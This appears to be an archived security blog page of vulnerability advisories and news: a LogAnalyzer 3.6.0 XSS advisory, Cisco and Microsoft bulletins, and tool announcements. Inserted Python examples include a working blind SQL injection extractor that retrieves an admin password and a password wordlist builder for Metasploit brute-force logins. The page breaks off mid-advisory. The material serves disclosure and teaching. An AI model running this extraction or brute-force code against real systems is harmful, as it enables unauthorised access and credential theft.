Title:
======
Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability
Date:
=====
2012-12-20
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=792
Vendor: http://loganalyzer.adiscon.com/security-advisories/loganalyzer-cross-site-scripting-vulnerability-in-oracle_query-paramater
VL-ID:
=====
792
Common Vulnerability Scoring System:
====================================
1.5
Introduction:
=============
LogAnalyzer is part of Adiscon's MonitorWare line of monitoring applications. It runs both under Windows and Unix/Linux.
The database can be populated by MonitorWare Agent, WinSyslog or EventReporter on the Windows side and by rsyslog on
the Unix/Linux side. LogAnalyzer itself is free, GPLed software (as are some other members of the product line).
(Copy of the Vendor Homepage: http://loganalyzer.adiscon.com/ )
Abstract:
=========
An independent vulnerability laboratory researcher discovered a cross site scripting vulnerability in the Log Analyzer v3.6.0 web application.
Report-Timeline:
================
2012-12-20: Public or Non-Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Remote
Severity:
=========
Low
Details:
========
A client-side cross-site scripting vulnerability was discovered in the LogAnalyzer 3.6.0 web application.
The vulnerability allows a remote attacker, with a high degree of user interaction required, to trigger client-side XSS requests.
The vulnerability is located in the asktheoracle.php file and is bound to the vulnerable oracle_query request parameter.
An attacker can use the oracle_query parameter to make the victim's browser execute arbitrary script code in the context of the LogAnalyzer page.
Successful exploitation of the vulnerability results in client-side execution of the injected script, client-side phishing,
client-side module context manipulation and unauthorized external redirects.
Vulnerable File(s):
[+] asktheoracle.php
Vulnerable Parameter(s):
[+] oracle_query
Proof of Concept:
=================
The client side cross site scripting vulnerability can be exploited by remote attackers with medium or high required user interaction and without a privileged application user account.
http://192.168.1.10:8080/loganalyzer-3.6.0/asktheoracle.php?type=searchstr&oracle_query=[CLIENT SIDE SCRIPT CODE!]
Note: The 'oracle_query' parameter is not properly sanitized on the asktheoracle.php page.
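The pattern behind this finding, and a check for it after upgrading, as an added Python example that is not part of the advisory and not LogAnalyzer's code. LogAnalyzer is written in PHP; the two response functions below are a constructed emulation of the unfixed and the fixed behaviour (reflecting the parameter raw into an HTML attribute versus HTML-encoding it on output). The canary string and the base URL are assumptions. `reflects_unescaped` is the check: it requests the page with a canary containing quotes and angle brackets in oracle_query and reports whether they came back verbatim; pass it a urllib-based `fetch` to run it against a real host.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Canary carrying every metacharacter a reflected sink must neutralise.
# The marker text is arbitrary (constructed for this example).
CANARY = "'\"<xsschk7f3a>"


def _param(url, name):
    """Read one query-string parameter the way a PHP $_GET lookup would."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def vulnerable_response(url):
    """Constructed stand-in for the unfixed behaviour: the parameter value is
    written straight into an HTML attribute (this is NOT LogAnalyzer's code)."""
    q = _param(url, "oracle_query")
    return f'<input type="text" name="oracle_query" value="{q}">'


def hardened_response(url):
    """Same page with output encoding applied at the point of emission:
    html.escape(quote=True) neutralises <, >, &, ' and \" for attribute context."""
    q = _param(url, "oracle_query")
    return f'<input type="text" name="oracle_query" value="{html.escape(q, quote=True)}">'


def reflects_unescaped(fetch, base_url, param="oracle_query"):
    """Send the canary in `param` and report whether it came back verbatim.
    `fetch(url) -> str` may wrap urllib.request for a live host; here it is
    one of the emulations above."""
    url = f"{base_url}?type=searchstr&{param}={quote(CANARY, safe='')}"
    return CANARY in fetch(url)


if __name__ == "__main__":
    base = "http://192.168.1.10:8080/loganalyzer-3.6.0/asktheoracle.php"  # from the PoC
    print("unfixed reflects raw metacharacters:", reflects_unescaped(vulnerable_response, base))
    print("hardened reflects raw metacharacters:", reflects_unescaped(hardened_response, base))
```

The check deliberately asks for the raw canary rather than a working `<script>` payload: if a single quote or angle bracket survives output encoding, an attacker will find a payload for that context, so the presence of the raw characters is the finding.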
Solution:
=========
Upgrade to the latest version of Log Analyzer 3.6.1
Risk:
=====
The security risk of the client side cross site scripting web vulnerability is estimated as low(+)
Credits:
========
Mohd Izhar Ali - [http://johncrackernet.blogspot.com]
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2012 | Vulnerability Laboratory
Thursday, December 20, 2012
Loganalyzer Cross Site Scripting Vulnerability in oracle_query parameter
A cross-site scripting vulnerability in the oracle_query parameter of the asktheoracle.php page was brought to our attention by Mohd Izhar Bin Ali. We thank them for giving us the chance to fix this issue before releasing information into the public. More details about the vulnerabilities can be found in this security advisory.
Affected Stable Versions:
Stable branch up to v3.6.0 (inclusive)
Fix:
Update to 3.6.1 or higher (if available)
Cross Site Scripting
Short Description:
A cross-site scripting vulnerability existed in the asktheoracle.php page. An attacker could use it to execute arbitrary HTML and Script code by using the oracle_query parameter.
Potential Impact:
An attacker could use prepared links to include and run scripts within the context of LogAnalyzer on the users browser.
Credits:
We want to thank Mohd Izhar Bin Ali for identifying these issues and working with us in resolving them. More details can be found in their advisory.
Wednesday, December 19, 2012
Kiwi Syslog Web Access 1.4.4 SQL Injection & Blind SQL Injection
Product: Kiwi Syslog Web Access
Version: 1.4.4
Vendor: http://www.kiwisyslog.com/kiwi-syslog-server-overview/
Vulnerability type: SQL Injection and Blind SQL Injection
Risk level: High
Vendor notification: 2012-12-18
Tested on: Windows 2003
Author: Mohd Izhar Ali
Kiwi Syslog Web Access version 1.4.4 suffers from remote SQL injection and blind SQL injection vulnerabilities.
You can download here:
http://packetstormsecurity.org/files/118945/Kiwi-Syslog-Web-Access-1.4.4-SQL-Injection.html
Labels:
Hacking,
IDS/NSM,
Pen-Test,
Security,
Vulnerability
Tuesday, September 25, 2012
How to find latest IE vulnerability (CVE-2012-4969) with Nexpose
As you probably know, Microsoft released advisory 2757760 (Microsoft Security Advisory (2757760): Vulnerability in Internet Explorer Could Allow Remote Code Execution) which describes a Remote Code Execution vulnerability in Internet Explorer 7, 8, and 9. This was assigned to CVE-2012-4969 and Microsoft released a Security Update patch on September 21st, 2012 (Microsoft Security Bulletin MS12-063 - Critical : Cumulative Security Update for Internet Explorer (2744842)) to address this vulnerability.
Check out this blog about the 0-day exploit released by the Metasploit team on September 17th, 2012. As of Nexpose 5.4.5, released on September 22nd, 2012, you can also now find and remediate any assets that are vulnerable. Here's how:
To continue reading, please click here:
phpMyAdmin Compromised Source Package Backdoor Security Issue
A security issue has been reported in phpMyAdmin, which can be exploited by malicious people to compromise a vulnerable system. The security issue is caused due to the distribution of a compromised phpMyAdmin source code package containing a backdoor, which can be exploited to e.g. execute arbitrary PHP code.
Secunia ID:
Release Date: 25 Sep 2012
Criticality:
Solution Status: Vendor Patch
Software: phpMyAdmin 3.x
Where:
Impact: System access. This covers vulnerabilities where malicious people are able to gain system access and execute arbitrary code with the privileges of a local user.
Description: A security issue has been reported in phpMyAdmin, which can be exploited by malicious people to compromise a vulnerable system. The security issue is caused due to the distribution of a compromised phpMyAdmin source code package containing a backdoor, which can be exploited to e.g. execute arbitrary PHP code. The compromised source file was distributed via the "cdnetworks-kr-1" SourceForge mirror with the phpMyAdmin-3.5.2.2-all-languages.zip download.
Solution: Download and reinstall phpMyAdmin.
Reported by: The vendor credits Tencent Security Response Center.
Original Advisory:
Saturday, February 04, 2012
FBI Arrests Suspected LulzSec and Anonymous Hackers
Search warrants were also being executed in New Jersey, Minnesota and Montana. The FBI arrested two alleged members of the hacking collectives LulzSec and Anonymous on Thursday morning in San Francisco and Phoenix, According to Fox news. The suspected hacker arrested in California is homeless and alleged to have been involved in the hacking of Santa Cruz County government websites.
The person arrested in Arizona is a student at a technical university and allegedly participated in the widely publicized hack against Sony. Both groups have been targeted by the FBI and international law enforcement agencies in recent months.
Meanwhile, the FBI arrested an alleged Anonymous member in San Francisco. The man, who is reported to be homeless, is said to have been involved in internet attacks against Santa Cruz County government websites. Just because a man is homeless, of course, doesn't mean that he can't get an internet connection. Coffee houses, cafes, libraries, etc. can all offer cheap or free internet access - and because the computer being used can be a shared device, it may be harder to identify who might have been responsible for an attack compared to a PC at a home.
The arrests shouldn't surprise anyone. They made two errors:
Mistake #1: They brought too much attention to themselves.
It is said that John Gotti, the mafia boss, brought so much attention to himself that he became a natural, high profile target for law enforcement. As Amichai Shulman, our CTO, stated before, the Lulzsec, the hackers "were extremely unfocused in their goal and gained attention mainly due to the relative intensity of their activity and lack of other good media topics." They brought too much attention to themselves and you could expect law enforcement to find them. If you look at hacking historically, over the past 20 years many of the high-profile attacks or those that involve serious losses to governments or commercial companies have ended up with law enforcement finding the perpetrators eventually, such as Albert Gonzalez.
Mistake #2: They didn't cover up their tracks.
Let's review some of the Lulzsec chat logs from a few months ago. One snippet, in reference to discussions Lulzsec was having with the media, shows how the hackers themselves admit they gave away too much information:
Topiary - Sabu and I got a bit carried away and gave LulzSec away a bit
As Imperva's Tal Be'ery said in this USA Today article, "When you're running this kind of operation for a long time, especially with not very concrete plans, you're bound to make mistakes." The mistakes Lulzsec and Anonymous made during their hacking spree left an electronic trail with enough footprints to produce today's arrests.
Thursday, December 15, 2011
sslyze – Fast and Full-Featured SSL Configuration Scanner
Transport Layer Security (TLS), commonly called SSL, is one of the most widely used protocols to secure network communications. As costs fall and user security and privacy expectations rise, companies are deploying it more widely every year. Attacks against the CA system, SSL implementation flaws and aging protocol versions have grabbed news headlines, bringing attention to weak configurations and the need to avoid them. Additionally, server misconfiguration has always greatly increased the overhead caused by SSL, slowing the transition to improved communications security.
To help improve system configurations, iSEC is releasing the free software tool SSLyze. iSEC has found the tool helpful for analyzing the configuration of SSL servers and for identifying misconfiguration such as the use of outdated protocol versions, weak hash algorithms in trust chains, insecure renegotiation, and session resumption settings.
SSLyze is a stand-alone Python application that looks for classic SSL misconfiguration, while providing the advanced user with the opportunity to customize the application via a simple plugin interface.
Features
- Insecure renegotiation testing
- Scanning for weak strength ciphers
- Checking for SSLv2, SSLv3 and TLSv1 versions
- Server certificate information dump and basic validation
- Session resumption capabilities and actual resumption rate measurement
- Support for client certificate authentication
- Simultaneous scanning of multiple servers, versions and ciphers
For example, SSLyze can help users identify server configurations vulnerable to THC's recently released SSL DoS attack by checking the server's support for client-initiated renegotiation. For more information on testing for client-initiated renegotiation, you can read here.
You can download sslyze here:
Microsoft Security Bulletin for December 2011
Microsoft’s Security Bulletin for December 2011 includes 13 bulletins addressing 17 vulnerabilities. Three of the bulletins are rated "critical": MS11-087, MS11-090, and MS11-092 and the rest are "important". This month many of the patches relate to vulnerabilities with known exploits likely available in the wild, so it is essential that organizations prioritize patching as soon as possible.
Microsoft reports that the exploit code for the “critical” MS11-087 and MS11-092 is likely to be in the wild. This comes as no surprise with MS11-087, which addresses the much publicized zero-day vulnerability related to the malicious Duqu worm. The vulnerability is in Windows kernel-mode drivers and could allow remote code execution. Microsoft previously released a workaround for this as a part of Microsoft Security Advisory #2639658, so organizations applying patch MS11-087 need to also undo the workaround if it was deployed.
MS11-092 is a vulnerability in Windows Media player and Media Center, which an attacker could use to phish a victim into visiting a site or opening a file on their site. Microsoft also reports that there is likely already exploit code available for this vulnerability.
This month, there are a couple of updates related to Internet Explorer. MS11-090 is an ActiveX bug that exploits a user when they visit a webpage with Internet Explorer. MS11-099 is a cumulative security update for Internet Explorer. Browser updates always get my attention because browsers are on the front line in the security battle. As we approach the end of the year, organizations should be thinking about bringing in the new year by upgrading their legacy browsers and upgrading to Internet Explorer 9.
There are several bulletins related to the Microsoft Office suite and applications related to it such as PowerPoint, Publisher, and Excel. MS11-094, related to PowerPoint, is likely to have exploit code in the wild.
According to the 80/20 rule, 20% of your vulnerabilities will likely cause 80% of your security risk. I see Microsoft getting the number of critical bulletins way down, but at the same time those criticals could be responsible for mass compromises and included in mass malware packs.
This is a month where Microsoft patched a wide variety of vulnerabilities so organizations need to test and patch the “critical” ones as soon as possible, and prioritize the “importants” by which ones have exploit code available, and which ones allow remote code execution.
From: https://community.rapid7.com/community/infosec/blog/2011/12/14/microsoft-security-bulletin-for-december-2011
Tuesday, December 06, 2011
Vendor Security
I’d like to share our experiences with vendor security since I’m sure it’s something that impacts all of us. Like every company, Rapid7 relies on a number of technology vendors for a huge range of products and services to run the business. I’m sure no one will be surprised to hear that as a security company we have a policy specifying the security requirements that our vendors need to meet before we’ll do business with them. Our view is that their security directly impacts any of our internal or customer data that their systems hold, so we take it as seriously as our own infrastructure security. Most or all of you probably have the same approach, but one unique thing that we have at our disposal is a number of highly skilled security experts on staff which allows us to have a mandatory application security assessment as part of our policy.
The results of this policy over the last few years have been eye-opening. The number of prospective vendors that pass our security bar is disappointingly low, across every category we used (marketing tools, sales tools, support tools, file transfer tools, IT infrastructure, etc). The most recent failure sparked this blog post, but it was the norm rather than the exception. More often than not they fail basic tests with numerous readily apparent and easily exploitable issues. If the vendor has a great product or service that we think is significantly better than the alternatives we evaluated, we’ll delay our deployment while we engage with them to address the issues we found, getting commitments to fix in a defined timeline. The results there have been equally dismal, with most of them missing their commitments and forcing us to end up going with an alternate months later. It’s clear that our security bar is far higher than their bar, but also that in many cases they don’t have either the desire or skills to significantly improve their security.
All of this ends up slowing our deployment of the various third party solutions, which is an acceptable tradeoff in our view. But what do we do when none of the vendors in the space pass the security bar? And more broadly, what can we do as a security community to raise awareness of the state of vendor security and create impetus for change? Our individual efforts to push the vendors we’ve engaged with generally haven’t been enough to move the ball. If you have any suggestions on how we can tackle this as a community, please post them below.
In the meantime, I thought I’d share our own approach in case it’s useful to any of you. The overall approach we use is a coordinated process between procurement, legal, and IT security. Having a coordinated process between the business discussion and technical due diligence allows for not just improved decision making, but also more informed negotiation.
- First, in addition to screening new vendors, if you haven’t already been doing this, start by pulling together a list of all your existing vendors (particularly SaaS vendors that have an exposed security surface). This will be eye-opening the first time you do it, since lots of groups will have been using tools without any IT involvement.
- One useful tactic we use to find out what’s in use and catch new ad-hoc “deployments” that bypass your vetting process is a periodic review of corporate credit card statements, flagging expenses associated with known vendors & SaaS providers.
- Use a security questionnaire to understand their security policies, processes, and sophistication.
- Demand to see the results of their latest security audit, showing what was tested, the findings, and the remediation they’ve done since that time. (We do an audit ourselves because we can). Negotiate for rights to this on a periodic basis.
- Pay close attention to audit logging functionality. Does the SaaS application track and report on login/logout, user actions within the application, and does it track source IP address? At the very least, you will want to conduct periodic reviews of the account logs to check for anomalies.
- Scrutinize the identity management capabilities and set a policy for how they are used. Access management, particularly account management, is one of the weakest areas of SaaS security today. Multiple users are often tempted to share accounts because account limits are common to SaaS: this practice needs to be discouraged. Organizational password strength and password rotation policies are usually difficult to enforce when it comes to SaaS. Account provisioning and de-provisioning usually happens outside the IT group, and sometimes there are multiple users on a SaaS application with the ability to create accounts but no single user with clear ownership of, and responsibility for, the application. This creates a substantial risk that accounts will not be revoked in a timely fashion upon a change in employment status. Some approaches that can mitigate the issue:
- Ensure that IT is solely responsible for account management in all SaaS applications.
- Conduct periodic reviews of active SaaS accounts across all applications, matching to current employee rosters.
- Work with your SaaS provider to enact IP-level restrictions to all logins, so that employees are required to be either physically present in the office or connected to the VPN to log in to the SaaS application. This will require the VPN to operate in “full tunnel” mode, where all traffic (including internet traffic) is driven over the VPN to egress from the corporate network.
- Most SaaS applications allow you to grant different levels of permissions to different users. As much as possible, place reasonable limits on user access levels in SaaS applications. Restrict manager privileges to as few accounts as possible.
As companies increasingly rely on SaaS solutions to do every day business, and security moves even further outside of your control, it becomes more and more important to proactively ensure the security and integrity of the solution you rely on. Employing a number of these suggestions, when considering your SaaS solutions, will help put you on the road to a higher level of security serving both your internal stakeholders and customers well.
Article from Rapid7 Blog:
The Mole – Automatic SQL Injection SQLi Exploitation Tool
The Mole is an automatic SQL injection exploitation tool. Given only a vulnerable URL and a valid string on the site, it can detect the injection and exploit it, using either the union technique or a boolean-query-based technique.
Features:
- Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
- Command line interface. Different commands trigger different actions.
- Auto-completion for commands, command arguments and database, table and columns names.
- Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
- Developed in python 3.
If you want to see documentation, download or tutorial, please refer here:
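The boolean-query technique The Mole automates (and the blind SQL injection class the Kiwi Syslog Web Access post above refers to), as an added Python example that is not The Mole's code and is not taken from either product. The vulnerable endpoint, its in-memory SQLite tables, the "valid string" marker and the secret value are all constructed for the example; the page under test is passed in as a callable, so the same detection and extraction logic could be pointed at an HTTP wrapper. A parameterised version of the same endpoint is included as the control: the detection step must come back negative against it.

```python
import sqlite3

VALID_MARKER = "Record found"   # the "valid string" a Mole-style tool keys on


def build_target():
    """Constructed in-memory database standing in for the target's backend."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE logs (id INTEGER PRIMARY KEY, host TEXT, msg TEXT)")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pass TEXT)")
    db.executemany("INSERT INTO logs (host, msg) VALUES (?, ?)",
                   [("web01", "accepted login"), ("web02", "kernel: oom")])
    db.execute("INSERT INTO users (name, pass) VALUES ('admin', 'S3cr3t!')")
    return db


def vulnerable_page(db, host):
    """Stand-in for a vulnerable endpoint: the parameter is concatenated into SQL."""
    sql = "SELECT msg FROM logs WHERE host = '" + host + "'"
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error:
        return "Error"
    return VALID_MARKER if rows else "No records"


def hardened_page(db, host):
    """Same endpoint with a bound parameter: input can never change the query shape."""
    rows = db.execute("SELECT msg FROM logs WHERE host = ?", (host,)).fetchall()
    return VALID_MARKER if rows else "No records"


def detect_boolean_injection(page, host="web01"):
    """A true and a false tautology must flip the marker for the injection to exist."""
    return (VALID_MARKER in page(host + "' AND '1'='1")
            and VALID_MARKER not in page(host + "' AND '1'='2"))


def blind_extract(page, subquery, host="web01", max_len=32):
    """Boolean-based blind extraction: binary-search each byte of the subquery's
    result through the true/false oracle (7 requests per byte), stopping when
    substr() runs past the end (unicode('') is NULL, so every comparison fails)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr(({subquery}),{pos},1)) > {mid}"
            if VALID_MARKER in page(f"{host}' AND {cond} AND '1'='1"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


def run_demo():
    """Detection, extraction and the hardened control; returns the three results."""
    db = build_target()
    vuln = lambda h: vulnerable_page(db, h)
    hard = lambda h: hardened_page(db, h)
    return (detect_boolean_injection(vuln),
            blind_extract(vuln, "SELECT pass FROM users WHERE name='admin'"),
            detect_boolean_injection(hard))


if __name__ == "__main__":
    injectable, secret, hardened_injectable = run_demo()
    print("vulnerable endpoint injectable:", injectable)
    print("extracted admin password:", secret)
    print("hardened endpoint injectable:", hardened_injectable)
```

The extraction never sees query output, only whether the marker string is present, which is exactly the situation the "blind" in blind SQL injection describes; the union technique, by contrast, needs the injected SELECT's rows to be rendered in the page.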
Labels:
Database,
Hacking,
Pen-Test,
Security,
Vulnerability
Adding custom wordlists in Metasploit for brute force password audits
In any penetration test that involves brute forcing passwords, you may want to increase your chances of a successful password audit by adding custom wordlists specific to the organization that hired you. Some examples:
- If you are security testing a hospital, you may want to add a dictionary with medical terms.
- If you're testing a German organization, users are likely to use German passwords, so you should add a German wordlist.
- Another good idea is to build a custom wordlist based on the organization's website (try the Wordlist Ruby gem to generate a wordlist based on a URL scrape).
For more details, please refer to this Metasploit Blog:
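A scrape-and-mangle wordlist builder of the kind the third bullet describes, as an added Python example that is not the Wordlist gem and not Metasploit code. The sample HTML page, the minimum word length and the mangling rules (capitalisation, common suffixes, two assumed years, simple leet substitutions) are constructed assumptions; the output is a plain newline-separated file of the shape Metasploit's USER_FILE/PASS_FILE options read.

```python
import re
from html.parser import HTMLParser

# Constructed sample of a target organisation's web page (not a real site).
SAMPLE_HTML = """<html><head><title>Mercy Hospital - Cardiology</title>
<script>function trackVisitor(){ return 42; }</script></head>
<body><h1>Welcome to Mercy Hospital</h1>
<p>Our cardiology and oncology departments opened in 1998.</p></body></html>"""


class _TextExtractor(HTMLParser):
    """Collects visible text, skipping <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def extract_words(html_text, min_len=4):
    """Unique lower-cased words of at least min_len characters, in page order."""
    parser = _TextExtractor()
    parser.feed(html_text)
    tokens = re.findall(r"[A-Za-z][A-Za-z0-9]{%d,}" % (min_len - 1),
                        " ".join(parser.parts))
    return list(dict.fromkeys(t.lower() for t in tokens))


LEET = str.maketrans("aeios", "43105")   # assumed substitution table


def mutate(word, years=(2011, 2012)):
    """Mangling rules users actually apply: case, common suffixes, years, leet."""
    variants = [word, word.capitalize(), word.upper()]
    for base in (word, word.capitalize()):
        variants += [base + "1", base + "123", base + "!"]
        variants += [f"{base}{y}" for y in years]
    variants.append(word.translate(LEET))
    return list(dict.fromkeys(variants))


def build_wordlist(html_text, years=(2011, 2012)):
    """Scrape, mangle and dedupe; returns the candidate list in order."""
    out = []
    for w in extract_words(html_text):
        out.extend(mutate(w, years))
    return list(dict.fromkeys(out))


def write_wordlist(path, words):
    """One candidate per line, the format Metasploit's *_FILE options read."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(words) + "\n")


if __name__ == "__main__":
    words = build_wordlist(SAMPLE_HTML)
    write_wordlist("custom_wordlist.txt", words)
    print(len(words), "candidates, first ten:", words[:10])
```

Feed the file to a login scanner with `set PASS_FILE custom_wordlist.txt`; for a live target, replace SAMPLE_HTML with the body of each fetched page and merge the results.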
October 2011: Ten Cisco Vulnerabilities
The Cisco Product Security Incident Response Team (PSIRT) has published ten important vulnerability advisories:
- Buffer Overflow Vulnerabilities in the Cisco WebEx Player
- Cisco Unified Contact Center Express Directory Traversal Vulnerability
- Denial of Service Vulnerability in Cisco Video Surveillance IP Cameras
- Cisco Security Agent Remote Code Execution Vulnerabilities
- Cisco Unified Communications Manager Directory Traversal Vulnerability
- CiscoWorks Common Services Arbitrary Command Execution Vulnerability
- Cisco Show and Share Security Vulnerabilities
- Directory Traversal Vulnerability in Cisco Network Admission Control Manager
- Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
- Multiple Vulnerabilities in Cisco Firewall Services Module
Buffer Overflow Vulnerabilities in the Cisco WebEx Player
Multiple buffer overflow vulnerabilities exist in the Cisco WebEx Recording Format (WRF) player. In some cases, exploitation of the vulnerabilities could allow a remote attacker to execute arbitrary code on the system with the privileges of a targeted user.
Vulnerable Products
The vulnerabilities disclosed in this advisory affect the Cisco WRF players. The Microsoft Windows, Apple Mac OS X, and Linux versions of the players are all affected. Review the following table for the list of releases that contain the nonvulnerable code. Affected versions of the players are those prior to client build T26 SP49 EP40 and T27 SP28. These build numbers are available only to WebEx site administrators. End users will see a version such as “Client build: 27.25.4.11889.” This indicates the server is running software version T27 SP25 EP4.
Details
The Cisco WebEx Recording Format (WRF) Player is affected by the following vulnerabilities:
- Cisco WebEx Player WRF Parsing Vulnerability: This vulnerability has been assigned the following Common Vulnerabilities and Exposures (CVE) identifier: CVE-2011-3319
- Cisco WebEx Player ATAS32 Processing Vulnerability: This vulnerability has been assigned the following Common Vulnerabilities and Exposures (CVE) identifier: CVE-2011-4004
The vulnerabilities may cause the player application to crash or, in some cases, remote code execution could occur.
Impact
Successful exploitation of the vulnerabilities described in this document could cause the Cisco WRF player application to crash and, in some cases, allow a remote attacker to execute arbitrary code on the system with the privileges of the user who is running the WRF player application.
Cisco Unified Contact Center Express Directory Traversal Vulnerability
Cisco Unified Contact Center Express (UCCX or Unified CCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) contain a directory traversal vulnerability that may allow a remote, unauthenticated attacker to retrieve arbitrary files from the filesystem.
Vulnerable Products
The following Cisco UCCX versions are vulnerable:
- Cisco UCCX version 6.0(x)
- Cisco UCCX version 7.0(x)
- Cisco UCCX version 8.0(x)
- Cisco UCCX version 8.5(x)
The following Cisco Unified IP Interactive Voice Response versions are vulnerable:
- Cisco Unified IP Interactive Voice Response version 6.0(x)
- Cisco Unified IP Interactive Voice Response version 7.0(x)
- Cisco Unified IP Interactive Voice Response version 8.0(x)
- Cisco Unified IP Interactive Voice Response version 8.5(x)
Details
The Cisco Unified Contact Center Express is a single/two node server, integrated “contact center in a box” for use in deployments with up to 300 agents until software version 8.0(x) and 400 agents starting at version 8.5(x). The vulnerability is due to improper input validation, and could allow the attacker to traverse the filesystem directory. An attacker could exploit this vulnerability by sending a specially crafted URL to the affected system. The vulnerability in Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response could be exploited over TCP port 8080 in 6.0(x) and 7.0(x) versions and TCP port 9080 starting in 8.0(x) version of the product.
Impact
Successful exploitation of the vulnerability may allow a remote, unauthenticated attacker to retrieve arbitrary files from the Cisco Unified Contact Center Express or Cisco Unified IP Interactive Voice Response filesystem.
Denial of Service Vulnerability in Cisco Video Surveillance IP Cameras
A denial of service (DoS) vulnerability exists in the Cisco Video Surveillance IP Cameras 2421, 2500 series and 2600 series of devices. An unauthenticated, remote attacker could exploit this vulnerability by sending crafted RTSP TCP packets to an affected device. Successful exploitation prevents cameras from sending video streams, subsequently causing a reboot. The camera reboot is done automatically and does not require action from an operator.
Vulnerable Products
Cisco Video Surveillance IP Cameras 2421, 2500 series, and 2600 series are affected by this vulnerability. For Cisco Video Surveillance 2421 and 2500 series IP Cameras, all 1.1.x software releases and releases prior to 2.4.0 are affected by this vulnerability. For Cisco Video Surveillance 2600 IP Cameras, all software releases before 4.2.0-13 are affected by this vulnerability.
Details
The Cisco Video Surveillance IP Cameras 2421, 2500 series, and 2600 series of devices are affected by a crafted RTSP TCP packet denial of service vulnerability that may allow an unauthenticated attacker to cause the device to reload by sending a series of crafted packets. This vulnerability can be exploited from both wired and wireless segments.
Impact
Successful exploitation of the vulnerability may result in a DoS condition. Subsequent exploitation may result in a sustained DoS condition, as the cameras will continue to reload.
Cisco Security Agent Remote Code Execution Vulnerabilities
Cisco Security Agent is affected by vulnerabilities that could allow an unauthenticated attacker to perform remote code execution on the affected device. These vulnerabilities are in a third-party library (Oracle Outside In) and are documented in CERT-CC.
Vulnerable Products
These vulnerabilities only affect 6.x versions of Cisco Security Agent running on Windows platforms.
Details
Version 6.x of Cisco Security Agent running on Windows platforms is affected by the following vulnerabilities:
- Vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5.0 allows local users to affect availability, related to File ID SDK: This vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2011-0794
- Vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.2.0 and 8.3.5.0 allows local users to affect availability via vectors related to Outside In Filters: This vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2011-0808
Impact
Successful exploitation of these vulnerabilities could allow an unauthenticated attacker to perform remote code execution on the affected device that will execute with Administrator privileges.
Cisco Unified Communications Manager Directory Traversal Vulnerability
Cisco Unified Communications Manager contains a directory traversal vulnerability that may allow an unauthenticated, remote attacker to retrieve arbitrary files from the filesystem.
Vulnerable Products
The following products are affected by this vulnerability:
- Cisco Unified Communications Manager 6.x
- Cisco Unified Communications Manager 7.x
- Cisco Unified Communications Manager 8.x
Details
Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices such as IP phones, media processing devices, VoIP gateways, and multimedia applications.
Impact
Successful exploitation of the vulnerability may allow a remote, unauthenticated attacker to retrieve arbitrary files from the filesystem.
CiscoWorks Common Services Arbitrary Command Execution Vulnerability
CiscoWorks Common Services for Microsoft Windows contains a vulnerability that could allow an authenticated, remote attacker to execute arbitrary commands on the affected system with the privileges of a system administrator.
Vulnerable Products
This vulnerability affects all versions of CiscoWorks Common Services-based products running on Microsoft Windows. Common Services version 4.1 and later are not affected by this vulnerability.
Details
CiscoWorks Common Services for Microsoft Windows contains a vulnerability that could allow an authenticated, remote attacker to execute arbitrary commands on the affected system with the privileges of a system administrator. The vulnerability is due to improper input validation in the CiscoWorks Home Page component. An attacker could exploit this vulnerability by sending a specially crafted URL to the affected system. An exploit could allow the attacker to execute arbitrary commands on the affected system with the privileges of a system administrator.
This vulnerability affects CiscoWorks Common Services running only on Microsoft Windows.
This vulnerability could be exploited over the default management ports, TCP port 1741 or 443.
Impact
